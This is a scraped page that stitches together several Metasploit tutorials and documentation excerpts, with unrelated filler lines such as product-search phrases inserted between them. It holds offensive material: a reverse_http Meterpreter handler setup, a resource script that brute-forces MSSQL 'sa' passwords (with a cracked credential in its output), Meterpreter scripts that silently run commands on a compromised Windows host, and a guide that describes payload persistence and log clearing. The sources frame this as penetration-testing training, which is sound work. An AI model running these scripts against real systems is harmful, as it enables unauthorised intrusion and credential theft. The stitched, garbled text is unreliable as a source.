Metasploit script

Metasploit script DEFAULT

NSEDoc

Script types: portrule
Categories: intrusive, safe
Download: https://svn.nmap.org/nmap/scripts/metasploit-info.nse

User Summary

Gathers info from the Metasploit rpc service. It requires a valid login pair. After authentication it tries to determine Metasploit version and deduce the OS type. Then it creates a new console and executes few commands to get additional info.

References:

See also:

Script Arguments

metasploit-info.password

Valid metasploit rpc password (required)

metasploit-info.command

Custom command to run on the server (optional)

metasploit-info.username

Valid metasploit rpc username (required)

slaxml.debug

See the documentation for the slaxmllibrary.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the httplibrary.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauthlibrary.

Example Usage

nmap <target> --script=metasploit-info --script-args username=root,password=root

Script Output

55553/tcp open metasploit-msgrpc syn-ack | metasploit-info: | Metasploit version: 4.4.0-dev Ruby version: 1.9.3 i386-mingw32 2012-02-16 API version: 1.0 | Additional info: | Host Name: WIN | OS Name: Microsoft Windows XP Professional | OS Version: 5.1.2600 Service Pack 3 Build 2600 | OS Manufacturer: Microsoft Corporation | OS Configuration: Standalone Workstation | OS Build Type: Uniprocessor Free | ..... lots of other info .... | Domain: WORKGROUP |_ Logon Server: \\BLABLA

Requires


Author:

License: Same as Nmap--See https://nmap.org/book/man-legal.html

Sours: https://nmap.org/nsedoc/scripts/metasploit-info.html

Metasploit Resource File  Scripts

 

In this series, I have been trying to familiarize you with the many features of the world's best framework for exploitation, hacking, and pentesting, Metasploit. There are so many features, and techniques for using those features, that few pentesters/hackers are aware of all of them.

Many times, when doing a pentest/hack, we need to run a number of Metasploit commands repeatedly. These commands may be exactly the same each time, and just like scripting, we may need to automatically run multiple Metasploit commands in a single step. Metasploit has the capability to save and store these "scripts," and they can then be recalled by the script name. Metasploit calls these scripts resource files.

For example, in many attacks, we need to set up a multi/handler to connect to when a payload is executed on a target system. In my new Powersploit series, or with the web delivery Metasploit module, we will always need to set a multi/handler to receive the connections from a sent payload. This usually involves several commands: using the multi/handler, setting the port, setting the payload, setting the IP, an so on. To make things easier, we can store all of these commands in a resource file and simply run a single command to execute all of them.

Now that you have a better idea of when these would be useful, let's take a look at Metasploit's scripting capabilities with resource files.

Step 1: Exploring Resource Scripts in Metasploit

First, let's take a look at where Metasploit store its scripts. Let's navigate to/usr/share/metasploit-framework/scripts/resources, and then do a long listing.

kali > cd /usr/share/metasploit-framework/scripts/resource


kali > ls -l

 

As you can see, Metasploit has numerous scripts already developed and stored here. Any new script that we write will be stored here as well.

Step 2: Writing Our Own Resource Script

Now let's create our own simple script to start a multi/handler necessary to receive connections, such as we used in the first Powersploit tutorial. First, start Metasploit, then enter the commands we want in our script.

kali > msfconsole


msf > use exploit/multi/handler


msf > set PAYLOAD windows/meterpreter/reverse_http


msf > set LHOST 192.168.181.128


msf > set LPORT 4444

 

When we have completed all of the commands we want in the script, we simply use the keyword makerc followed by the name of the script. For instance, here I named the script, handler_http.rc (a multi/handler for HTTP followed by the Metasploit extension for resource files, rc).

msf > makerc handler_http.rc

Metasploit now saves each of those commands into that script file.

Step 3: Checking the Script Contents

If we want to see want commands are in a script file, we can use one of the many commands in Linux to display the contents of a file, such as cat, less, and more. Here, I used more followed by the resource file name.

msf > more handler_http.rc

 

Notice that Metasploit now displays the commands in my script file, handler_http.rc.

Step 4: Executing Our New Script File

When we want to execute this script, we simply precede the script name with the keyword resource such as:

msf > resource handler_http.rc

 

Metasploit will now run each of the commands in our script automatically. Now simply type exploit to start our handler.

msf > exploit

Step 5: Checking Whether It Was Saved

If we go back to the location where the scripts are stored, we can see that our new script, handler_http.rc, is now stored with the other Metasploit prepackaged scripts.

 

 

 

 

 

 

 

Step 6: Starting the Script Automatically with Metasploit

If we know before starting Metasploit that we will be using a particular script, we can have Metasploit automatically execute the script upon starting. We do this by starting Metasploit with the msfconsole command, the -r switch, and followed by the name of the resource file we want to execute upon opening, such as:

kali > msfconsole -r handler_http.rc

 

Now, when Metasploit starts, it will automatically execute the handler_http.rc script, and you are ready to go.

Sours: https://www.hackers-arise.com/metasploit-resource-scripts
  1. Coleman camp stove replacement knobs
  2. Buying nx through steam
  3. Modern planter with drainage
  4. Otic migraine

Metasploit Scripting

As any other seasoned pentester, I love using the Metasploit Framework during engagements. Using the database integration helps greatly in keeping all of my reconnaissance scans neatly formatted and easily queried. The “-R” switch was a welcome addition for configuring “RHOSTS” variables within modules (hosts -R, services -p 80 -R, etc…). It utilizes the host and service information within your database to configure modules to target specific hosts instead of sweeping entire ranges. The only piece missing in this utility is that some modules require “RPORT” to be configured as well. I’ll use the “auxiliary/scanner/mssql/mssql_login” module for example. If you used “auxiliary/scanner/mssql/mssql_ping” to scan for SQL servers, it’s very likely that not all of the hosts discovered are running on the old default port 1433, so each non-standard port configuration would have to be tested individually. Previously, to work around this limitation, I would export the results from “mssql_ping” to a text file and use a python script to brute force weak “sa” credentials. Now, I’ve finally figured out how to create a simple resource script to automate the configuration of “RHOSTS” and “RPORT” that i’d like to share.

First, if you’re not familiar with the automation capabilites provided by the Metasploit team, HD wrote a good overview of six different ways to automate the Metasploit Framework. Also, the guys over at Offensive Security have a great intro into the Meterpreter scripting capabilities. Since I’m horrible at ruby scripting, I decided to take the route of a simple resource script, which does take advantage of some simple ruby scripting.

Here is the code:

use auxiliary/scanner/mssql/mssql_login set USER_FILE /opt/sql_brute/sql_users.txt set PASS_FILE /opt/sql_brute/sql_wordlist.txt set VERBOSE false set THREADS 255

The script is pretty self-explanatory, but lets walk through it quickly. The upper half simply selects the “mssql_login” module and configures the static options. The lower half of the script is where we drop into the ruby interpreter and create some magic. We iterate through all hosts in the database and all respective services. If the service “name” equals “mssql” and the service is “open”, “RHOSTS” is assigned the IP of that system and “RPORT” is assigned that port. Finally, we “run” the module and any successfully brute forced credentials are displayed with their respective host IP.

Here is a quick example, first running the “mssql_ping” module to enumerate SQL servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > set RHOSTS 192.168.81.0/24 RHOSTS => 192.168.81.0/24 msf auxiliary(mssql_ping) > set THREADS 255 THREADS => 255 msf auxiliary(mssql_ping) > run [*] Scanned 028 of 256 hosts (010% complete) [*] SQL Server information for 192.168.81.203: [+] ServerName = VULNXP [+] InstanceName = SQLEXPRESS [+] IsClustered = No [+] Version = 9.00.1399.06 [+] tcp = 31337 [*] Scanned 097 of 256 hosts (037% complete) [*] Scanned 166 of 256 hosts (064% complete) [*] Scanned 202 of 256 hosts (078% complete) [*] Scanned 236 of 256 hosts (092% complete) [*] Scanned 249 of 256 hosts (097% complete) [*] Scanned 250 of 256 hosts (097% complete) [*] Scanned 254 of 256 hosts (099% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ping) > resource /root/scripts/msf/sql_brute.rc [*] Processing /root/scripts/msf/sql_brute.rc for ERB directives. resource (/root/scripts/msf/sql_brute.rc)> use auxiliary/scanner/mssql/mssql_login resource (/root/scripts/msf/sql_brute.rc)> set USER_FILE /opt/sql_brute/sql_users.txt USER_FILE => /opt/sql_brute/sql_users.txt resource (/root/scripts/msf/sql_brute.rc)> set PASS_FILE /opt/sql_brute/sql_wordlist.txt PASS_FILE => /opt/sql_brute/sql_wordlist.txt resource (/root/scripts/msf/sql_brute.rc)> set VERBOSE false VERBOSE => false resource (/root/scripts/msf/sql_brute.rc)> set THREADS 255 THREADS => 255 [*] resource (/root/scripts/msf/sql_brute.rc)> Ruby Code (277 bytes) RHOSTS => 192.168.81.203 RPORT => 31337 [*] 192.168.81.203:31337 - MSSQL - Starting authentication scanner. [+] 192.168.81.203:31337 - MSSQL - successful login 'sa' : 'password1' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

In just a fraction of a second, Metasploit returns successful authentication credentials. This simple script is easy to port to other modules, such as the “auxiliary/scanner/http/tomcat_mgr_login”, “auxiliary/scanner/http/jboss_vulnscan”, or any other module that requires “RHOSTS” and “RPORT” configurations. I would love to see this fucntionality built into Metasploit, but for now, we have a simple workaround. A big thanks goes to the Metasploit Framework development team at Rapid7 for maintainig an incredible framework.

This article was written by Larry Spohn @Spoonman1091 | Senior Security Consultant.

Sours: https://www.trustedsec.com/blog/metasploit-scripting/
Automate Metasploit With Your Own Bash Script [Tutorial]

Metasploit Build StatusMaintainabilityTest CoverageDocker Pulls

The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

The latest version of this software is available from: https://metasploit.com

Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework

New bugs and feature requests should be directed to: https://r-7.co/MSF-BUGv1

API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api

Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

Installing

Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.

Using Metasploit

Metasploit can do all sorts of things. The first thing you'll want to do is start , but after that, you'll probably be best served by reading Metasploit Unleashed, the great community resources, or the wiki.

Contributing

See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.

Sours: https://github.com/rapid7/metasploit-framework

Script metasploit

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit. Conceptually, they're just like batch scripts. They contain a set of commands that are automatically and sequentially executed when you load the script in Metasploit. You can create a resource script by chaining together a series of Metasploit console commands and by directly embedding Ruby to do things like call APIs, interact with objects in the database, and iterate actions.

Historically, Metasploit users have only been able to run resource scripts from msfconsole. However, a recent enhancement to Metasploit Pro now enables commercial users to run resource scripts directly from the web interface.

Resource scripts enable you to do almost anything you can do in the Metasploit Framework in Metasploit Pro. For example, let's say that you want to find all the hosts in your workspace that match a certain criteria and you want to run a series of modules against them. You can build a resource script to automate these actions for you. If you've been using task chains in Metasploit Pro, you're probably wondering why you can't use them to automate this scenario. The simple answer is that you can't query data, refine your search results, or use Ruby with task chains.

The power of resource scripts lie in their ability to leverage most of the capabilities that are available in Metasploit and Ruby, whether you are using them from the Metasploit console or from the Metasploit web interface.

Available resource scripts

The Metasploit Framework provides several resource scripts that have been contributed by the community. If you're a framework user, you can go to ​to see the resource scripts that are available. If you're a Metasploit Pro user, you can go to Modules > Resource scripts in the web interface or you can go to the resource scripts directory, which is located in .

Each resource script is designed to perform specific tasks and achieve specific goals; however, you may need to modify the script to run them successfully in your environment. Most of the resource scripts have descriptions that explain what the script does and any prerequisites that need to be met before you can run the script.

Viewing a description of the resource script

Most resource scripts include a description that tells you what it does and what parameters you may need to customize for the script to work in your environment.

If you're a framework user, you may need to open the actual resource script file to view the description using your preferred editor, such as vi, vim, or gedit. However, some resource scripts, such as autoexploit.rc, include a option, which you can run with the command to see the description and identify any required arguments. For example, let's take a look at the description for autoexploit.rc.

The description tells you that the script runs a specific exploit on hosts that might be vulnerable based on vulnerability references from your imported scan data and shows the arguments that you can pass with the script.

If you're a Metasploit Pro user, you can click on the script name to see the contents of the full script, as shown below:

Creating resource scripts

Although there are several resource scripts that are available through the framework, you may want to build a custom script of your own. For example, if you routinely run a specific exploit and payload combination against a target, you may want to create a resource script to automate these commands for you. Since this example uses purely msfconsole commands, the easiest way to create a resource script is through the command available in msfconsole. The command records all of the commands you've run in the console and saves them in a resource script for you.

Let's take a look at the following example:

To save these commands to a resource script, we can use the command. We'll need to provide the output location and name we want the script to use:

The resulting resource script will contain the following:

Each time you run the resource script, these commands will be executed exactly the same each time.

Now, let's say you want to import an Nmap scan and iterate a module over those hosts, such as an auxiliary/scanner module, to find intel on each host. Since you'd need to be able to access the database, this example requires you to build a resource script using a combination of Ruby and msfconsole commands, as shown below:

Since each resource script is treated like an ERB template, you can embed Ruby to do useful things like interact with objects in the database. In the script example above, we embedded Ruby to iterate a module run over a set of hosts.

Importing resource scripts

If you've created a custom resource script, you'll need to import it into Metasploit to run it. The method you'll use to import resource scripts varies depending on the version of Metasploit you're using.

Importing resource scripts into Metasploit Pro

Resource scripts are stored within a project. You can import resource scripts into a project by going to Modules > Resource scripts. You'll need to browse to the location of the resource file you want to import and upload it into your project.

After you import a resource script, you will be able to run it from within the project, either as a standalone task or as part of a task chain. All imported resource scripts are stored in the directory. Removing any files from this location will remove them from the project, which may affect any task chains that use them.

Importing resource scripts into Metasploit Framework

All resource scripts in the Metasploit Framework are stored in ​. You can add any resource scripts you've created in this directory for easy access from msfconsole or you can store them anywhere you want on your system. You'll just need to reference the full path to the resource script when you run it with the command or flag.

You can run resource scripts from msfconsole or from the web interface. Before you can run a resource script, you need to identify the required parameters that need to be configured for the script to run.

Running resource scripts from Metasploit Framework

If you're a Metasploit Framework user, you can run a resource script from msfconsole with the command or you can run a resource script when you start msfconsole with the flag from msfconsole.

If you want to automatically run a resource script when msfconsole launches, you can use the flag:

Or more specifically, if you want to run the autoexploit resource script, you'd run the following:

If you have already started msfconsole, you can run a resource script using the following syntax:

Running resource scripts from Metasploit Pro

To run a resource script from Metasploit Pro, go to Modules > Resource scripts and find the script you want to run. Click on the script name to access the details page, which will show you a description for the script and the Run option. When you are ready to run the script, click Run and the script will launch.

The task log appears and shows you the executing tasks. After the resource scripts finishes running, you can go to the Analysis area of the application to view any data that was imported into the project.

Adding resource scripts to a Task Chain

A task chain comprises of a sequence of preconfigured tasks that you can schedule to run on a recurring basis or save to run on demand. It defines the tasks that will run, the settings for each task, and the conditions required for the execution of those tasks. Task chains come in handy when you want to schedule and automate running your resource scripts according to a schedule or save them to run on demand. For more information on how to create a task chain, see Working with Task Chains.

Sours: https://docs.rapid7.com/metasploit/resource-scripts
Metasploit Automation using Resource Script (Metasploit Scan Automation Technique) - Ummed Meel

Custom Scripting

Now that we have a feel for how to use irb to test API calls, let’s look at what objects are returned and test basic constructs. Now, no first script would be complete without the standard ‘Hello World’, so let’s create a script named helloworld.rb and save it to /usr/share/metasploit-framework/scripts/meterpreter.

[email protected]:~# echo “print_status(“Hello World”)” > /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb

We now execute our script from the console by using the run command.

meterpreter > run helloworld [*] Hello World meterpreter >

Now, lets build upon this base. We will add a couple of other API calls to the script. Add these lines to the script:

print_error(“this is an error!”) print_line(“this is a line”)

Much like the concept of standard in, standard out, and standard error, these different lines for status, error, and line all serve different purposes on giving information to the user running the script.

Now, when we execute our file we get:

meterpreter > run helloworld [*] Hello World [-] this is an error! this is a line meterpreter >

helloworld.rb

print_status("Hello World") print_error("this is an error!") print_line("This is a line")

Wonderful! Let’s go a bit further and create a function to print some general information and add error handling to it in a second file. This new function will have the following architecture:

def geninfo(session) begin ….. rescue ::Exception => e ….. end end

The use of functions allows us to make our code modular and more re-usable. This error handling will aid us in the troubleshooting of our scripts, so using some of the API calls we covered previously, we could build a function that looks like this:

def getinfo(session) begin sysnfo = session.sys.config.sysinfo runpriv = session.sys.config.getuid print_status("Getting system information ...") print_status("tThe target machine OS is #{sysnfo['OS']}") print_status("tThe computer name is #{'Computer'} ") print_status("tScript running as #{runpriv}") rescue ::Exception => e print_error("The following error was encountered #{e}") end end

Let’s break down what we are doing here. We define a function named getinfo which takes one parameter that we are placing in a local variable named session. This variable has a couple methods that are called on it to extract system and user information, after which we print a couple of status lines that report the findings from the methods. In some cases, the information we are printing comes out from a hash, so we have to be sure to call the variable correctly. We also have an error handler placed in there that will return what ever error message we might encounter.

Now that we have this function, we just have to call it and give it the Meterpreter client session. To call it, we just place the following at the end of our script:

getinfo(client)

Now we execute the script and we can see the output of it:

meterpreter > run helloworld2 [*] Getting system information ... [*] The target machine OS is Windows XP (Build 2600, Service Pack 3). [*] The computer name is Computer [*] Script running as WINXPVM01labuser

helloworld2.rb

def getinfo(session) begin sysnfo = session.sys.config.sysinfo runpriv = session.sys.config.getuid print_status("Getting system information ...") print_status("tThe target machine OS is #{sysnfo['OS']}") print _status("tThe computer name is #{'Computer'} ") print_status("tScript running as #{runpriv}") rescue ::Exception => e print_error("The following error was encountered #{e}") end end getinfo(client)

As you can see, these very simple steps build up to give us the basics for creating advanced Meterpreter scripts. Let’s expand on this script to gather more information on our target. Let’s create another function for executing commands and printing their output:

def list_exec(session,cmdlst) print_status("Running Command List ...") r='' session.response_timeout=120 cmdlst.each do |cmd| begin print_status "trunning command #{cmd}" r = session.sys.process.execute(“cmd.exe /c #{cmd}”, nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) print_status("t#{d}") end r.channel.close r.close rescue ::Exception => e print_error("Error Running Command #{cmd}: #{e.class} #{e}") end end end

Again, let’s break down what we are doing here. We define a function that takes two parameters, the second of which will be a array. A timeout is also established so that the function does not hang on us. We then set up a “for each” loop that runs on the array that is passed to the function which will take each item in the array and execute it on the system through cmd.exe /c, printing the status that is returned from the command execution. Finally, an error handler is established to capture any issues that come up while executing the function.

Now we set an array of commands for enumerating the target host:

commands = [ “set”, “ipconfig /all”, “arp –a”]

and then call it with the command

list_exec(client,commands)

With that in place, when we run it we get:

meterpreter > run helloworld3 [*] Running Command List ... [*] running command set [*] ALLUSERSPROFILE=C:\Documents and Settings\All Users APPDATA=C:\Documents and Settings\P0WN3D\Application Data CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=TARGET ComSpec=C:\WINNT\system32\cmd.exe HOMEDRIVE=C: HOMEPATH= LOGONSERVER=TARGET NUMBER_OF_PROCESSORS=1 OS=Windows_NT Os2LibPath=C:\WINNT\system32\os2dll; Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 7 Stepping 6, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0706 ProgramFiles=C:\Program Files PROMPT=$P$G SystemDrive=C: SystemRoot=C:\WINNT TEMP=C:\DOCUME~1\P0WN3D\LOCALS~1\Temp TMP=C:\DOCUME~1\P0WN3D\LOCALS~1\Temp USERDOMAIN=TARGET USERNAME=P0WN3D USERPROFILE=C:\Documents and Settings\P0WN3D windir=C:\WINNT [*] running command ipconfig /all [*] Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : target Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : localdomain Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Physical Address. . . . . . . . . : 00-0C-29-85-81-55 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : 172.16.104.145 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.16.104.2 DHCP Server . . . . . . . . . . . : 172.16.104.254 DNS Servers . . . . . . . . . . . : 172.16.104.2 Primary WINS Server . . . . . . . : 172.16.104.2 Lease Obtained. . . . . . . . . . : Tuesday, August 25, 2009 10:53:48 PM Lease Expires . . . . . . . . . . : Tuesday, August 25, 2009 11:23:48 PM [*] running command arp -a [*] Interface: 172.16.104.145 on Interface 0x1000003 Internet Address Physical Address Type 172.16.104.2 00-50-56-eb-db-06 dynamic 172.16.104.150 00-0c-29-a7-f1-c5 dynamic meterpreter >

helloworld3.rb

def list_exec(session,cmdlst) print_status("Running Command List ...") r='' session.response_timeout=120 cmdlst.each do |cmd| begin print_status "running command #{cmd}" r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) print_status("t#{d}") end r.channel.close r.close rescue ::Exception => e print_error("Error Running Command #{cmd}: #{e.class} #{e}") end end end commands = [ "set", "ipconfig /all", "arp -a"] list_exec(client,commands)

As you can see, creating custom Meterpreter scripts is not difficult if you take it one step at a time, building upon itself. Just remember to frequently test, and refer back to the source on how various API calls operate.

Sours: https://www.offensive-security.com/metasploit-unleashed/custom-scripting/

Similar news:

METASPLOIT RESOURCE FILES

Resource scripts provides an easy way for us to automate repetitive tasks in Metasploit. Conceptually they're just like batch scripts, they contain a set of commands that are automatically and sequentially executed when you load the script in Metasploit. You can create a resource script by chaining together a series of Metasploit console commands or by directly embedding Ruby to do things like call APIs, interact with objects in the database, modules and iterate actions.

pic


REFERENCIES


WHAT ARE RESOURCE FILES

The Metasploit Console (msfconsole) has supported the concept of resource files for quite some time. A resource file is essentially a batch script for Metasploit using these files you can automate common tasks. If you create a resource script called ~/.msf4/msfconsole.rc, it will automatically load each time you start the msfconsole interface. This is a great way to automatically connect to a database and set common parameters (setg PAYLOAD, setg RHOSTS, etc) As of revision r8876, blocks of Ruby code (ERB) can now be directly inserted into the resource script. This turns resource scripts into a generic automation platform for the Metasploit Framework.

The 'resource' command will execute msfconsole/meterpreter instructions located inside a text file containing one entry per line. 'resource' will execute each line in sequence. This can help automate repetitive actions performed users. By default the commands will run in current working dir (target machine) and resource file in local working dir (attacking machine).

WARNING: Before we can run a resource script, we need to identify the required parameters that need to be configured
for the script/auxiliary/exploit to run. Also remmenber to start postgresql service before interacting with metasploit console.

[!] Jump to article index


HOW TO RUN RESOURCE SCRIPTS?

You can run resource scripts from msfconsole or from the web interface. If you're a Metasploit Framework user, you can run a resource script from msfconsole or meterpreter prompt with the 'resource' command or you can run a resource script when you start msfconsole using the msfconsole -r flag (making msfconsole execute the resource script at startup).

To run resource script at msfconsole startup execute the follow command in your terminal:

To run resource script inside msfconsole execute the follow command in msfconsole:

To run resource script inside meterpreter execute the follow command in meterpreter:

To set a global variable (erb) and run resource script msfconsole startup execute the follow command:

[!] Jump to article index


HOW TO WRITE RESOURCE SCRIPTS?

There are two ways to create a resource script, which are creating the script manually or using the makerc command. Personally i recommend the makerc command over manual scripting, since it eliminates typing errors. The makerc command saves all the previously issued commands into a file, which can be used with the 'resource' command.

Open your text editor and copy/past the follow two metasploit core commands to it, save file and name it as: version.rc

[in terminal]::run the script::


The next example show us how to use msfconsole 'makerc' core command to write our resource script.

[in msfconsole]::Run the script::

In the next example we are going to write one handler resource file, because there are times when we 'persiste' our payload in target system and a few days later we dont remmenber the handler configurations set that day, thats one
of the reasons rc scripting can be usefull, besides automating the framework (erb scripting can access metasploit api).

Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: handler.rc

[in terminal]::Run the script::


The next example show us how to use msfconsole makerc core command to write our resource script.

[in msfconsole]::Run the script::

The next resource script allow us to record msfconsole activity under logfile.log and commands.rc
It also displays database information sutch as: framework version, active sessions in verbose mode, loads my auxiliary scripts local directory into msfdb (loading my modules) and executes the rc script handler.rc at msfconsole startup.

Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: record.rc

[in terminal]::Run the script::

gif

[!] Jump to article index


RESOURCE SCRIPTS IN POST EXPLOITATION

Auto-run scripts are great when you need multiple modules to run automatically. Lets assume the first thing(s) we do after a successfully exploitation its to elevate the current session to NT authority/system, take a screenshot of current desktop, migrate to another process and run post exploitation modules. Having all this commands inside a rc script saves us time.

Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: post.rc

[in meterpreter]::Run the script::

Auto-run scripts are great when you need to persiste fast your payload automatically. This next example demonstrates how to use resource scripts to successfully persiste a payload in target system and clean tracks (timestomp & clearev). Remmenber that you must have the update.exe in your working directory (local) to be uploaded to target system.

Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: persistence.rc

[in meterpreter]::Run the script::

In the next resource script all auxiliary modules require that RHOSTS and THREADS options are set before running the modules. In the next example we are using 'SETG' (global variable declarations) to configure all the options that we need before running the modules. So its advice before writing a resource file like this one, to first check what options are required for the auxiliary to run. The rc script will then run 3 auxiliary modules againts all hosts found inside local lan.

Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: http_brute.rc

[in terminal]::Run the script::

gif


[!] Jump to article index


RESOURCE SCRIPTS IN AutoRunScript

This next example demonstrates how we can auto-run our resource script automatically at session creation with the help of @darkoperator 'post/multi/gather/multi_command.rb' and msfconsole 'AutoRunScript' handler flag, for this to work we need to define a global variable (setg RESOURCE /root/gather.rc) to call our resource script at session creation.

Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: gather.rc

Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: post_handler.rc

[in terminal]::Run the script::

  • [in Handler]::AutoRunScript::OneLiner::
The easy way to reproduce this is: execute one multi/handler with the 'AutoRunScript' flag executing @darkoperator 'multi_console_command' script with the -r argument pointing to the absoluct path of our gather.rc script. That will execute our gather.rc (auto-running our resource script automatically at session creation).

gif


[!] Jump to article index


USING RUBY IN RC (ERB scripting)

ERB is a way to embed Ruby code directly into a document. This allow us to call APIs that are not exposed
via console commands and to programmatically generate and return a list of commands based on their own logic.
Basically ERB scripting its the same thing that writing a metasploit module from scratch using "ruby" programing language and some knowledge of metasploit API calls.

Open your text editor and copy/past the follow ruby (erb) code to it, save file and name it as: template.rc

[in terminal]::Run the script:

The next resource script uses 'db_nmap' metasploit core command to populate the msf database with hosts (address), then the ruby function will check what hosts has been capture and run 3 post-exploitation modules againts all hosts that are stored inside the msf database (db_nmap scan used: 192.168.1.0/24).

Open your text editor and copy/past the follow ruby (erb) code to it, save file and name it as: http_recon.rc

[in terminal]::Run the script::

Run auxiliary/exploit modules based on database (targets) ports found. Next resource script searchs inside msf database for targets open ports discover by db_nmap scan to sellect what auxiliary/exploits modules to run againts target system. REMARK: This script its prepared to accept user inputs (RHOSTS) and (USERPASS_FILE) throuth the 'SETG' global variable declaration, if none value has povided then this resource script will use is own default values.

setg In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the setg command. Once these have been set you can use them in as many exploits and auxiliary modules as you like to prevent always check auxiliary options before you run or exploit. Conversely, you can use the unsetg command to unset a global var.

Open your text editor and copy/past the follow ruby (erb) code to it, save file and name it as: brute_force.rc

[in terminal]::Run the script::

mysql_brute will use nmap to search/check for port 3306 open (mysql) then it populates the msfdb with a list of hosts found, and run auxiliary modules to gather info and brute force mysql services. if none value (setg) has povided then this resource script will use is own default values. (example: scan rhosts 192.168.1.0/24)

Open your text editor and copy/past the follow ruby (erb) code to it, save file and name it as: mysql_brute.rc

[in terminal]::Run the script::


pic

[!] Jump to article index


Suspicious Shell Activity (Red Team) @2019

Sours: https://github.com/r00t-3xp10it/hacking-material-books/blob/master/metasploit-RC%5BERB%5D/metasploit_resource_files.md


378 379 380 381 382